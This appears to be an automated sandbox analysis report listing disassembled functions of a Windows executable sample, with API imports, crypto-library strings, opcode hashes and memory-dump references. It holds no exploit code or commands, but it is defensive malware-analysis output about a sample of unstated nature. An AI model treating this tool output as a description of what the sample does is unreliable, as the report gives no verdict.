Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow$memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: exceeds the maximum of $: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted$: footer length of $: header length of $TruncatedFinal$setting key and IV
API String ID: 3618855185-3504708856
Opcode ID: 5d7bf8bfa13847f1f92a5224f9899b9c3168d38cc4adde183cc718c5c5e66638
Instruction ID: 4632e4dd4a485f4c1af4e60f492fb863b520742a5da63d53d3de6dc1e84f04fa
Opcode Fuzzy Hash: 5d7bf8bfa13847f1f92a5224f9899b9c3168d38cc4adde183cc718c5c5e66638
Instruction Fuzzy Hash: 10517E62729A82A6EB01DB65D9501EEB331FF86BC4F404036DA6D977D6EF2CD609C340

Function 00007FF6F18AC110 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18AA27E), ref: 00007FF6F18AC134

Strings

AllocatorBase: requested size would cause integer overflow, xrefs: 00007FF6F18AC144

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: terminate
String ID: AllocatorBase: requested size would cause integer overflow
API String ID: 1821763600-10355266
Opcode ID: e99cbac41870e0d777e51a1f9950d5bd21e2b9fc287f83b06bdae4cd738dfc70
Instruction ID: 390550c777ca7dac5cb46b6276ac66601d7aac21cfc9cf71cc6b3f9849e1a0e8
Opcode Fuzzy Hash: e99cbac41870e0d777e51a1f9950d5bd21e2b9fc287f83b06bdae4cd738dfc70
Instruction Fuzzy Hash: 1341EB65B2564A66EF146B3ADA452691651BF14FF8F284730EE3C877C1FF2CE4418340

Function 00007FF6F18CAA20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF6F18CAA45
GetLastError.KERNEL32 ref: 00007FF6F18CAA6C
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18CAAB8

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 00007FF6F18CAB7C
Timer: QueryPerformanceCounter failed with error , xrefs: 00007FF6F18CAA88

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: CounterErrorExceptionLastPerformanceQueryThrow
String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
API String ID: 945393631-2136607233
Opcode ID: 663ad1c23c2d792f350d154cde0a8e820dfe97cd782518160897b033cab290f2
Instruction ID: 9e30f9d0e6193dc6c749973925673b14bc6ff6374ffe7cdd0f6dcd01b2878bd4
Opcode Fuzzy Hash: 663ad1c23c2d792f350d154cde0a8e820dfe97cd782518160897b033cab290f2
Instruction Fuzzy Hash: DD411321B28A8292EB20DB64E9513AA37A1FF557C0F800236D57DC36E5FF2CE605CB00

Function 00007FF6F18AF960 Relevance: 13.6, APIs: 9, Instructions: 84COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AF9C4
memset.VCRUNTIME140 ref: 00007FF6F18AF9CB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AF9D0
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AF9DC
memmove.VCRUNTIME140 ref: 00007FF6F18AFA49
memmove.VCRUNTIME140 ref: 00007FF6F18AFA79
memset.VCRUNTIME140 ref: 00007FF6F18AFA90
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AFA95
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AFAA1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$_errno_invalid_parameter_noinfomemset
String ID:
API String ID: 3255005035-0
Opcode ID: 1fb40f9f67f319051a0a6c106a665e4aef6422a83c291834087031b2757cb5d0
Instruction ID: dc0001f3066eb6da6bc25a62e80ec1a5226693ac362270b8b74a8a285ba04d6d
Opcode Fuzzy Hash: 1fb40f9f67f319051a0a6c106a665e4aef6422a83c291834087031b2757cb5d0
Instruction Fuzzy Hash: E131A225A28B8286EB249F51E6442AD7660FF44BC4F584531DF7E977D5EF3CE0418200

Function 00007FF6F18B6450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B6537
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B65EB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B662A

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B6679
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B66B8

Strings

, xrefs: 00007FF6F18B6546
is not a valid number of rounds, xrefs: 00007FF6F18B652D, 00007FF6F18B654F

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: $ is not a valid number of rounds
API String ID: 15630516-2343365793
Opcode ID: 4af4fcc90dbbda8c25941f010ed61ca7b1c6b883cbeb2d123def4072ba69ca0c
Instruction ID: fc411455a320d61931a106b2aa96ad2874b08be56d131fa4e3bb6b4ca9962899
Opcode Fuzzy Hash: 4af4fcc90dbbda8c25941f010ed61ca7b1c6b883cbeb2d123def4072ba69ca0c
Instruction Fuzzy Hash: D971A162F24B4685EB10DBA4E6403AC2361AB457E8F504332EA7D97BD9EF3CE195C340

Function 00007FF6F18C3600 Relevance: 12.2, APIs: 8, Instructions: 166COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18C36C7
memset.VCRUNTIME140 ref: 00007FF6F18C36CE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C36D3
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C36DF
memmove.VCRUNTIME140 ref: 00007FF6F18C37E5
memset.VCRUNTIME140 ref: 00007FF6F18C37EC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C37F1
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C37FD

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 7d41cc51b87d472c9aa4cbc491a93cd1d62f8e16b4d85db83cf685f563a9f465
Instruction ID: d790fa86c72ba5adcc8183ed6f253e32a65312f2f87818f620818c972348dfb6
Opcode Fuzzy Hash: 7d41cc51b87d472c9aa4cbc491a93cd1d62f8e16b4d85db83cf685f563a9f465
Instruction Fuzzy Hash: 246190B6B28B4682EF209F55D640AAC27A1FB48BC4F554232DE7E83794EF7DD4468340

Function 00007FF6F18ACAB0 Relevance: 12.1, APIs: 8, Instructions: 140COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18ACBC4
memmove.VCRUNTIME140 ref: 00007FF6F18ACBE0
memset.VCRUNTIME140 ref: 00007FF6F18ACBF5
memmove.VCRUNTIME140 ref: 00007FF6F18ACC0D
memmove.VCRUNTIME140 ref: 00007FF6F18ACC27
memset.VCRUNTIME140 ref: 00007FF6F18ACC35
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18ACC95
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ACC9C

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1282081513-0
Opcode ID: 2eb2f6916b0c9afaf369dda152c728c18e197862635175937170c0791f0a97f3
Instruction ID: e4663460abdf044a7589f8e6dce45c0f40ce06c813629fa7f2660bb816dfd6e3
Opcode Fuzzy Hash: 2eb2f6916b0c9afaf369dda152c728c18e197862635175937170c0791f0a97f3
Instruction Fuzzy Hash: 7551EB62B28A85A6EF00DB59E6042B86751EB44BE0F490635DF7E977D5EF3CE041C304

Function 00007FF6F18AD970 Relevance: 12.1, APIs: 8, Instructions: 139COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA76
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA8B
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADA9B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADACF
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAD9
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAE9
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6F18A36A7), ref: 00007FF6F18ADAF9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ADB2B

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: c0b3a3c19648aadab42d74ad95ea230f62191146faed820b273ffe8d3855b996
Instruction ID: f5643d6126ebecf80a1550f0d3ff4a810eac60ebb486a3637b6e1918f512e660
Opcode Fuzzy Hash: c0b3a3c19648aadab42d74ad95ea230f62191146faed820b273ffe8d3855b996
Instruction Fuzzy Hash: 0841BF62729B8192EB209B1AE6542AD6361FB44BD4F544332DF7E87BC5EF3CE5418340

Function 00007FF6F18C3350 Relevance: 12.1, APIs: 8, Instructions: 138COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18C33CF
memset.VCRUNTIME140 ref: 00007FF6F18C33D6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C33DB
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C33E7
memmove.VCRUNTIME140 ref: 00007FF6F18C349A
memset.VCRUNTIME140 ref: 00007FF6F18C34A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C34A6
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C34B2

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 99a5012e49e95a5b35b302f22fc3811f145f8394952177a1b6f26074bbe6f85e
Instruction ID: 2bba68f701fe3878f663889fcd04fa9ad405e65667089956ffe5beb2f366d48c
Opcode Fuzzy Hash: 99a5012e49e95a5b35b302f22fc3811f145f8394952177a1b6f26074bbe6f85e
Instruction Fuzzy Hash: 3E5190B6A28A4681DB148B65E2906BC6761FB64BC4F440232EF7E937D5EF3DD491C340

Function 00007FF6F18C8D10 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E1C
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E33
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E48
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E60
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E79
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8E87
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8EEB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18C8EF2

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1282081513-0
Opcode ID: 105fb416d79b28d24ce52af3bfa807c9207d46460f8b326935d67bea50a9be05
Instruction ID: 47215272e8f8ae120cbeb8c8c06b6d0c0583d0bddfa918b22950e0cd74ad4d09
Opcode Fuzzy Hash: 105fb416d79b28d24ce52af3bfa807c9207d46460f8b326935d67bea50a9be05
Instruction Fuzzy Hash: 7F51D161B29A8552EF109B6AE6402BC6750EB46BE0F540B35EB7D9BBD5EF3CE1418300

Function 00007FF6F18C8B20 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C2D
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C44
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C59
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C71
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C8A
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8C98
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF6F18B5765), ref: 00007FF6F18C8CFC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18C8D03

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1282081513-0
Opcode ID: 5ca807be59a0d9650f7fb9d3c3f4d27369bb61caccbf921b31216826a251d858
Instruction ID: ba70da2779d5b252b44c336d1365b0e11ef9e5a7ade61b4a03fd31b65779ce29
Opcode Fuzzy Hash: 5ca807be59a0d9650f7fb9d3c3f4d27369bb61caccbf921b31216826a251d858
Instruction Fuzzy Hash: 22510271B29A8195EF149B6AE6002BC6750EB46BE0F540B35EB7C97BC9EF3CE1418300

Function 00007FF6F18AA4C0 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA53A
memset.VCRUNTIME140(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA546
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA54B
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA557
memmove.VCRUNTIME140 ref: 00007FF6F18AA5E6
memset.VCRUNTIME140 ref: 00007FF6F18AA5F2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AA5F7
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AA603

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfomemmovememset
String ID:
API String ID: 524079128-0
Opcode ID: 1fcf096b4714ee3a74191cd8aa9985451d0937fbf72f992208c08f3723d4ba83
Instruction ID: accf2378ef901f539f3a0c792f718bf4ed31c4b98e951fbee78629263a7dfdee
Opcode Fuzzy Hash: 1fcf096b4714ee3a74191cd8aa9985451d0937fbf72f992208c08f3723d4ba83
Instruction Fuzzy Hash: 9E41A0A2A28B8292E7588F94D6403AC3765FB04BC8F584035DA7D877D5EF78D096C340

Function 00007FF6F18AA6D0 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,00007FF6F18A9D5B), ref: 00007FF6F18AA72B
memmove.VCRUNTIME140 ref: 00007FF6F18AA7C4
memset.VCRUNTIME140 ref: 00007FF6F18AA7D0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AA7D5
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AA7E1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$_errno_invalid_parameter_noinfomemset
String ID:
API String ID: 3255005035-0
Opcode ID: c381f2f2cc97be33ea48ae9e0f19e2f761e0e5779ca13454b15f02d7857f6b8f
Instruction ID: 7433d42b7e6a9ba64b8dac301e0b2483f6a04e80029f6202a36b2f290228c8f6
Opcode Fuzzy Hash: c381f2f2cc97be33ea48ae9e0f19e2f761e0e5779ca13454b15f02d7857f6b8f
Instruction Fuzzy Hash: FB416A66A19B8292EB58DB59E6403A937B5FB04BC4F144135CA7E877D0EF3DE4A2C300

Function 00007FF6F18B7CA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B7DAF
